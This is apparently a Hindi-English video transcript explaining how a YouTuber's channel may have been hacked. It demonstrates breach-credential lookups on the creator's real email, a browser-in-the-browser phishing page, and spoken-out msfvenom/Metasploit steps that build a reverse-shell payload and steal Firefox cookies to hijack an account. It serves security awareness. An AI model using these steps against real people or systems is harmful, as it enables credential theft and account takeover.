Hi everyone, how's it going? So you might have heard about this recent incident जहाँ पे Beer Biceps and Ranveer Alabadia channel got hacked. So as per the reports, his channel was hacked on recent Wednesday night और hackers ने Beer Biceps और Ranveer Alabadia channel का नेम चेंज करके उसे elon.trump.teslalive2024 and tesla.eventtrump 2024 कर दिया था. Now ये कोई नई चीज़ नहीं है. बड़े यूट्यूबर्स का चैनल हैक होना हम आए दिन सुनते रहते हैं. रिसेंटली लाइनस टेक टिप्स का चैनल भी हैक हुआ था, जो कि एक काफ़ी बड़ा यूट्यूबर है फ्रॉम द वेस्ट. सेम गोज़ फॉर सुप्रीम कोर्ट. चैनल्स हैक करने के बाद थ्रेट एक्टर्स मोस्ट ऑफ द टाइम चैनल की सारी वीडियोस डिलीट कर देते हैं और उसमें एक क्रिप्टो लाइव स्ट्रीम चलाने लगते हैं. ज़्यादातर उस लाइव स्ट्रीम में कुछ बड़े नाम लाइक इलॉन मस्क एक पर्टिकुलर क्रिप्टो करेंसी में इन्वेस्ट करने की एडवाइस देते हैं, क्लेमिंग दैट कि अगर लेट्स से आप उसमें $1000 वर्थ ऑफ क्रिप्टो इन्वेस्ट करते हो, सो उसके बदले आपको $2000 की क्रिप्टो मिलेगी, सिमिलर टू लक्ष्मी चिट फंड. पैसा ही पैसा होगा. नाउ कमिंग टू द हैकिंग पार्ट, तो मैंने ऑनलाइन काफ़ी सर्च किया बट आई डिडंट फाइंड एनी एग्जैक्ट डिटेल्स हाउ बियर बाइसेप्स गॉट हैक्ड, बट आई हैव सम स्पेक्यूलेशंस. Usually there are 3 ways you can hack into a Google or YouTube account. Number 1 is breach credentials. So suppose आपकी जो Gmail ID जो आपके YouTube चैनल से कनेक्ट है, उसका यूज़ आप वेरियस वेबसाइट्स में करते हो, लेट्स से लिंक्डइन और जोमेटो, और एक दिन इन वेबसाइट्स में से किसी एक का डेटा ब्रीच हो जाता है. नाउ एज अ हैकर मुझे आपको डायरेक्टली हैक करने की ज़रूरत नहीं है, बल्कि मैं इन ब्रीच क्रेडेंशियल का यूज़ करके आपके अकाउंट का एक्सेस ले सकता हूँ. लेट्स सी हाउ. ऑलराइट, सो बेसिकली मैंने एक गूगल सर्च यहाँ पे किया है फॉर बियर बाइसेप्स ईमेल एड्रेस, और मुझे एक ईमेल एड्रेस मिला है जो कि है business@beerbiceps.com. सो अगर मैं इसे कॉपी करता हूँ और हैव आई बीन पोन्ड में चेक करता हूँ एंड लेट्स सी व्हाट वी फाइंड आउट. सो ये ऑलरेडी ब्रीच्ड है. सो देर आर 2 ब्रीचेस दैट कंटेन्स दिस पर्टिकुलर ईमेल एड्रेस. पहला है पब्लिक बिजनेस डेटा. सो पब्लिक बिजनेस डेटा में 2021 में ये ब्रीच हुआ था, जहाँ पे डेट ऑफ बर्थ, ईमेल एड्रेसेस, जॉब टाइटल्स, नेम्स, फ़ोन नंबर्स एंड फिजिकल एड्रेसेस यहाँ पे ब्रीच हुआ है रिलेटेड टू दिस पर्टिकुलर ईमेल आईडी. और उसके अलावा हमारे पास नाइट्रो है. नाइट्रो बेसिकली एक PDF सर्विस है जो 2020 में ब्रीच हुई थी, और यहाँ पे नेम्स, बीक्रिप्ट, पासवर्ड हैशेस एंड कन्वर्टेड डॉक्यूमेंट्स लीक हुए थे. सो ईमेल एड्रेस, नेम्स एंड पासवर्ड्स. सो बेसिकली यहाँ पे जो हमें दिखाया जा रहा है, यहाँ पे बेसिकली कोई भी अगर हम एक ईमेल एड्रेस डालते हैं, लेट्स से test@gmail.com अगर हम डालते हैं, एंड लेट्स सी अगर ये ब्रीच्ड है किसी डेटा ब्रीच में या नहीं. ओके, सो देयर आर मल्टीपल ब्रीचेस जहाँ पे ये ईमेल एड्रेस एक्सपोज हुआ है. 000 वेब होस्ट, 12RF एंड 500PX, आदित्य बिरला फैशन एंड रिटेल, अडोबी, AT&T, काफ़ी बड़े नाम हैं इसमें, और लिस्ट बहुत लंबी है, बिग बास्केट एंड ऑल. सो इसके बाद एक अटैकर क्या करेगा, जब उसको पता लग जाता है कि एक पर्टिकुलर ईमेल एड्रेस कहीं पे ब्रीच हुआ है, सो वो इसको कॉपी करेगा और इसको दूसरी वेबसाइट में, या फिर ब्रीच डेटा जो कि वो डार्क वेब से खरीद सकता है, या फिर ऐसी वेबसाइट्स का यूज़ कर सकता है जिसका नाम है लाइक डीहैश्ड. सो यहाँ पे हम ईमेल एड्रेस चेक कर सकते हैं. उसके लिए मुझे लॉगिन करना पड़ेगा, बट स्टिल. सो इसकी ये पेड है. इसको यूज़ करने के लिए आपको इसका सब्सक्रिप्शन लेना पड़ता है, जो कि $5 का मिल जाता है आपको, या ऑलमोस्ट $6. एंड यू कैन फाइंड आउट द पासवर्ड इफ़ इट हैज़ अ प्लेन टेक्स्ट पासवर्ड, तो आप आसानी से उसका पासवर्ड जान सकते हैं पर्टिकुलर ईमेल एड्रेस का. नाउ लेट्स मूव ऑन टू अनदर टेक्निक. नाउ द नेक्स्ट पॉसिबल थिंग इज़ फिशिंग. फिशिंग एक काफ़ी कॉमन फैक्टर है जो कि यूज़ होता है किसी के क्रेडेंशियल हार्वेस्ट करने के लिए, बट जहाँ तक मेरा मानना है बियर बाइसेप्स टीम इसके बारे में पहले से ही अवेयर होंगे. बट वट इफ़ आई पुल अप अ फिशिंग वेबसाइट जो कि ऑलमोस्ट लेजिट लगे एंड 2-factor ऑथेंटिकेशन भी बाईपास कर सके. लेट्स सी हाउ वी कैन डू दिस. ऑलराइट, सो इस पर्टिकुलर डेमो के लिए मैंने एक वेबसाइट बनाई है जो कि फ्री फायर के डायमंड्स आपको फ्री में प्रोवाइड कराती है लॉगिन करने के बाद. सो इस पर लॉगिन करने के लिए आपको 2 बटन दिख रहे होंगे. एक है साइन इन विद गूगल एंड साइन इन विद फेसबुक. सो आपको इस तरह के बटन कई वेबसाइट में आजकल दिखते होंगे, जहाँ पे आप अपनी गूगल ID या फेसबुक ID से डायरेक्टली लॉगिन कर पाते हैं और आपको कोई ईमेल ID और पासवर्ड देने की ज़रूरत नहीं पड़ती. इसको हम सिंगल साइन ऑन बोलते हैं. सो ये कन्वीनियंट तरीका है आपको लॉगिन करने का किसी भी वेबसाइट में. द बेस्ट थिंग अबाउट दिस अटैक इज़ दैट हम डायरेक्टली यहाँ पे जो विक्टिम है उसको किसी भी लॉगिन पेज पे नहीं भेज रहे हैं जिस पे सस्पिशन बढ़े. सो अगर कोई यूज़र यहाँ पे आके साइन इन विद गूगल करता है, तो यहाँ पे देखिए. सो वीव गॉट अ पॉपअप विंडो ओवर हेयर, और साइन इन विद गूगल का हमें लोगो दिख रहा है, accounts.google.com. सो दिस इज़ अ लेजिट डोमेन. जब आप Gmail पे आप लॉगिन करने की कोशिश करते हैं, और यहाँ पे एक पेज है जो कि बिल्कुल सिमिलर टू हूबहू Gmail की तरह है. तो अगर मैं इस पर कोई पासवर्ड डालता हूँ, लेट्स से beerbiceps.yt@gmail.com,
और पासवर्ड अगर मैं डालूँ इसमें, और अगर मैं साइन इन करता हूँ, इसके बाद देखिए क्या होता है। सो इसने मुझे एक एरर दिखाया और ये एक्सेस नहीं कर पा रहा है। मोस्ट ऑफ द टाइम ये मुझे रीडायरेक्ट कर देता है असली जीमेल अकाउंट पे, तो मुझे पता भी नहीं लगेगा कि मैं फ़िश हो चुका हूँ। पर अगर मैं यहाँ पे आऊँ अपने टर्मिनल पे, सो मैं देख पाऊँगा कि यहाँ पे मुझे beerbiceps.yt@gmail.com और उसका पासवर्ड जो कि है प्लीज़ सब्सक्राइब देखने को मिलता है। तो अगर आपको ये वीडियो अच्छी लग रही है तो आप प्लीज़ इसे लाइक कर देना और प्लीज़ सब्सक्राइब। सो लेट्स मूव ऑन नाउ। सो इफ़ आई लुक बैक इनटू द फिशिंग पेज, सो द मेन थिंग यहाँ पे है जो कि फिशिंग पेजेस को हम या डायरेक्टली आइडेंटिफाई करने के लिए यूज़ करते हैं, वो है डोमेन अकाउंट। बट यहाँ पे हमने वही स्पूफ कर दिया है। दिस टाइप ऑफ अटैक इज़ कॉल्ड ब्राउज़र इन द ब्राउज़र अटैक। ये एक थोड़ा एडवांस तरह की फिशिंग अटैक है जहाँ पे हम यूज़र को पहले किसी नॉन सस्पेक्टिंग वेबसाइट में रीडायरेक्ट करते हैं। अभी यहाँ पे मैंने फ्री फायर का एग्जांपल दिया है, बट लेट्स से रणवीर की टीम ने किसी अडोबी प्लगइन वेबसाइट पे जाके कोई प्लगइन खरीदने की कोशिश की जहाँ पे उन्होंने साइन इन विद गूगल करने की कोशिश करी, बट द वेबसाइट दे वर लॉगिंग इनटू वर एक्चुअली अ फिशिंग वेबसाइट। इसको मैं और बिलीवेबल बनाने के लिए इसके साथ Evil Engine X का यूज़ कर सकता हूँ, जिससे मैं मल्टी फैक्टर ऑथेंटिकेशन जो भी आपके 2FA कोड्स आपके फ़ोन में आते हैं उसको भी बाईपास कर पाऊंगा और रणवीर को पता भी नहीं चलेगा कि उसका अकाउंट कब हैक हो गया। सो आई थिंक दिस कुड बी वन ऑफ द techniques that the hacker used to get into his account. Now let's move on to our third technique. And at last we have session hijacking. Session hijacking एक ऐसा तरीका है जिससे मोस्ट ऑफ द चैनल्स पास्ट में हैक हुए हैं। इसमें हैकर्स आपकी टीम को कांटेक्ट करेगा वाया एन ईमेल और आपको प्रमोट करने के लिए कोई सॉफ्टवेयर देगा। आप जैसे ही उस सॉफ्टवेयर को अपने पीसी में रन करोगे, आपके सारे सेशंस हैकर के पास चले जाएंगे। जिसको सेशंस के बारे में नहीं पता, बेसिकली जितनी भी वेबसाइट जो इंटरनेट पे चल रही है, दे यूज़ अ प्रोटोकॉल कॉल्ड HTTP। अब HTTP के साथ प्रॉब्लम्स ये है कि वो स्टेटलेस है, मतलब उसको याद नहीं रहता उसे कब कौन रिक्वेस्ट भेज रहा है। मतलब लेट्स से आपने इंस्टाग्राम पे लॉगिन किया, नाउ लॉगिन करने के लिए आपने अपना यूज़र नेम और पासवर्ड इंस्टाग्राम को भेजा वाया HTTP एंड यू आर लॉग्ड इन। नेक्स्ट आपको किसी पिक्चर को लाइक करना है इंस्टाग्राम पे, दिस इज़ अनदर रिक्वेस्ट योर ब्राउज़र हैव टू मेक वाया HTTP। बट जैसे कि हमें पता है कि HTTP को भूलने की बीमारी है, तो उसे याद नहीं रहेगा कि आप ऑलरेडी लॉग्ड इन हो एंड पिक्चर लाइक करने के लिए लॉग्ड इन होना ज़रूरी है, तो आपको फिर लॉगिन करने के लिए बोलेगा और ये चलता ही रहेगा। तो इसी को टैकल करने के लिए कुकीज़ का निर्माण हुआ। अब कुकीज़ का कॉन्सेप्ट ये है कि जो भी डिटेल्स जो आपको फ्यूचर में काम आएगी एक वेबसाइट से इंटरैक्ट करते हुए, वो अब आपके कुकीज़ की फॉर्म में आपके ब्राउज़र में ही सेव हो जाएगी। इसीलिए आपने देखा होगा कि अगर आप जीमेल को अपने पीसी में लॉगिन करते हैं और फिर ब्राउज़र डायरेक्ट बंद कर देते हैं बिना लॉग आउट करे, और नेक्स्ट टाइम जब आप ब्राउज़र खोलते हैं तो आप लॉग्ड इन होते हैं, आपको कोई भी पासवर्ड देने की ज़रूरत नहीं पड़ती, और इसी को हम सेशन बोलते हैं। नाउ कमिंग बैक टू द हैकिंग पार्ट। ऑलराइट, सो इस पर्टिकुलर डेमो के लिए मैं अपनी अटैकिंग मशीन में आ गया हूँ जो कि है काली लिनक्स। सो काली लिनक्स बेसिकली एक ऑपरेटिंग सिस्टम है जो कि सिक्योरिटी रिसर्चर और हैकर्स द्वारा यूज़ किया जाता है। सो इस पर्टिकुलर डेमो के लिए हमें एक मालवेयर क्रिएट करना पड़ेगा विंडोज़ के लिए। सो मैं इसके लिए MSF Venom का यूज़ करूँगा। सो MSF Venom -P फॉर पेलोड। विंडोज़ x64 आर्किटेक्चर के लिए हम बना रहे हैं 64-बिट ऑपरेटिंग सिस्टम के लिए, एंड वी आर यूजिंग अ मीटर प्रिटर पेलोड। सो मीटर प्रिटर रिवर्स TCP। रिवर्स TCP मतलब जो कनेक्शन है वो रिवर्स मेरे पास मेरी अटैकिंग मशीन पे आएगा। एंड एल होस्ट हम प्रोवाइड कराएंगे 192.168.29.160। ये मेरी IP एड्रेस है। एंड एल पोर्ट जिस पोर्ट पे हम लिसन कर रहे हैं, लेट्स मेक इट 5555 एंड -F। सो फाइल टाइप होगा हमारा executable.exe फाइल, एंड लेट्स नेम इट program.exe। सो अब हमारा मालवेयर क्रिएट हो रहा है। सो MSF Venom एक टूल किट है काली लिनक्स में, जिसकी मदद से मैंने एक विंडोज़ मालवेयर बनाया है जो कि मेरे सिस्टम से कनेक्ट होगा इस पर्टिकुलर IP एड्रेस में, जैसे ही मैं इसको विक्टिम सिस्टम में एग्जीक्यूट करूँगा। बट बिफोर दैट हमें एक लिसनर क्रिएट करना पड़ेगा ताकि मैं कनेक्शंस ले पाऊँ विक्टिम सिस्टम का। तो उसके लिए मैं MSF कंसोल का यूज़ करूँगा, MSF कंसोल, एंड नाउ यूज़ एक्सप्लॉइट मल्टी हैंडलर। और अब हम पेलोड को सेट करेंगे। सो पेलोड जो हमने यूज़ किया था वो था विंडोज़ x64 मीटर प्रिटर एंड देन रिवर्स अंडरस्कोर TCP। एंड फिर से हम अपनी IP एड्रेस को सेट करेंगे, सेट एल होस्ट 192.168.29.160। और अब हम एल पोर्ट को सेट करेंगे। सो इट वाज 5555 और ना अब मैं लिखूँगा एक्सप्लॉइट। सो अब हमारा लिसनर रेडी हो चुका है।
and it is now listening for connections on this particular IP address. अब हमारा नेक्स्ट काम है वो है अपनी program.exe फाइल को विक्टिम को भेजना. ओके, सो मेरे पास एक विंडोज़ मशीन है यहाँ पे एज अ टारगेट, और अगर मैं यहाँ पे इंटरनेट एक्सप्लोरर को खोलूँ और लेट्स गो टू दिस पर्टिकुलर, सो यहाँ पे ये मेरा सर्वर है जहाँ पे मैंने अपनी program.exe को होस्ट किया हुआ है, एंड दिस इज़ द program.exe, और मैं इसको सेव कर देता हूँ. सो अगर मैं अब डाउनलोड में जाऊँ, सो मैं यहाँ पे देख पाता हूँ अपनी program.exe फाइल को. नाउ अगर मैं इस पर डबल क्लिक करता हूँ और रन दबाता हूँ, सो लुक एट दिस, सो मीटर पिटर सेशन ओपन. सो नाउ हमें एक्सेस मिल चुका है पर्टिकुलर सिस्टम का. अगर मैं लिखूँ sysinfo, सो मैं देख पाऊँगा यहाँ पे विंडोज़ 10 चल रही है, एंड इट इज़ 64 बिट ऑपरेटिंग सिस्टम जिसके लिए हमने पेलोड बनाया था. और अगर मैं इसको स्क्रीनशॉट लूँ इस पर्टिकुलर विंडोज़ मशीन का, सो स्क्रीनशॉट सेव हो चुका है इस पर्टिकुलर नाम से. सो लेट्स लुक इनटू इट. एंड दिस इज़ द स्क्रीनशॉट. ग्रेट. सो एज वी कैन सी हमें यहाँ पे 3 ब्राउज़र दिख रहे हैं. एक है फायरफॉक्स, दूसरा है गूगल क्रोम, एंड तीसरा है एज. सो इस पर्टिकुलर डेमो के लिए मैंने फायरफॉक्स में एक रेडिट अकाउंट बनाया था जो कि आप देख सकते हैं यहाँ पे. सो दिस इज़ द रेडिट अकाउंट, एंड या सो दिस इज़ माई demo Reddit account Captain Bison 5457, and let's say we have to capture its cookies and get access to this particular Reddit account. So इसके दो तरीके हो सकते हैं. एक, मैं इस Reddit account का यूज़र नेम पासवर्ड कैप्चर कर लूँ, बट अगर इस पर्टिकुलर उस Reddit account में 2-factor authentication इनेबल होगा, सो इट कुड बी डिफ़िकल्ट फॉर मी टू गेट एक्सेस टू द अकाउंट. बट अगर मैं इसका सेशन कुकीज़ कैप्चर कर लूँ या इसका सेशन हाईजैक कर लूँ, so I will be able to get into this account very easily. So let's do that. I'll go back to my attacker machine for this. Alright, so हम अपने attacker machine में हैं, और मैं इस particular session को अभी पहले background करूँगा. And now we'll search for Firefox, a plugin that is Firefox Creds. So this is the plugin और post exploitation module in Metasploit. So I'll use that. और इसको use करने के लिए हम इसकी help check करेंगे. And okay, so options, and we have to provide a session number. So set session, we already know we have a session 1 over here, and let's run it and let's see. All right, so it is downloading something, and it has downloaded some files for me: cert9.db, cookies, SQLite database, key4, and login.json. What we are interested in is this particular file. So let's copy it and let's go to another terminal. I'll cancel it, and sudo will open it in SQLite browser because it is a SQLite database. So एक SQL database है, इसको हम SQLite browser की मदद से open करेंगे. I'll provide my password और let's see. So we've got bunch of values over here, and these are the values for reddit.com. So हमारे पास काफ़ी values हैं यहाँ पे cookies की form में, but this one is really important. This is Reddit session. So let's see, अगर मैं अपने browser में I'll open up my Firefox and let's go to a private window and go to reddit.com. So मेरे पास अभी ये लॉगिन यहाँ पे नहीं है बिकॉज ये मेरे से लॉगिन मांगेगा अगर मैं लॉगिन करने की कोशिश करूँगा. आई डोंट हैव द पासवर्ड राइट नाउ, बट आई कैन ऑल्सो गेट द पासवर्ड. बट हम अभी कुकी की मदद से इससे एक्सेस करने की कोशिश करेंगे. सो आई टाइप F12 और यहाँ पे मुझे कुछ वैल्यूज़ दिख रही है कुकीज़ की स्टोरेज में फॉर गूगल एंड रेडिट. सो आई डिलीट ऑल एंड डिलीट ऑल. नाउ I'll add all the values of the Reddit cookies from here manually to my browser. Let's do that. So it will take a couple of minutes. I'll do that and let's see what happens. A few minutes later. Alright, so I have inserted all the values manually over here. और अगर मैं अब इसको refresh करूँ, let's see. Bingo! We got access to this particular Reddit account. So हमने सिर्फ कुकीज़ की मदद से इस पर्टिकुलर रेडिट अकाउंट में एक्सेस कर लिया है, एंड नाउ वी कैन यूज़ इट लाइक इट्स आर्ट्स. सो आई थिंक दिस इज़ वन ऑफ द टेक्निक्स दैट इज़ मोस्टली यूज बाय द अटैकर्स नाउ डेज.
यूट्यूब चैनल्स को हैक करने के लिए, और मे बी रणवीर के साथ भी यही हुआ होगा, बिकॉज रणवीर हैज़ क्वाइट अ ह्यूज टीम. सो किसी से भी गलती हो सकती है एंड इट्स जस्ट मैटर ऑफ सम क्लिक्स. सो टू समराइज दिस वीडियो, हमने यहाँ पे 3 टेक्निक्स देखी जिससे एक जीमेल अकाउंट को हम हैक कर सकते हैं. फर्स्ट वाज ब्रीच क्रेडेंशियल्स, जो कि आई डोंट थिंक सो रणवीर के केस में वैलिड है, बट इफ़ यू आर नॉट यूजिंग 2 फैक्टर ऑथेंटिकेशन, आप ब्रीच क्रेडेंशियल के शिकार बड़े ईजिली हो सकते हैं. नेक्स्ट इज़ योर फिशिंग. सो आई हैव शोन यू एन एडवांस लेवल ऑफ फिशिंग. एंड द थर्ड वन इज़ योर कुकीज़. सो योर सेशंस आर रियली इंपॉर्टेंट, जो आपके ब्राउज़र, और सिर्फ आपकी एक क्लिक की गलती की वजह से वो अटैकर के पास ईजिली जा सकते हैं. सो आई होप you like this video. If you have, please give us a thumbs up and subscribe to this channel. And I'll meet you in the next one. Till then, Ranveer has a question for you. मंजिल क्या है? डेथ.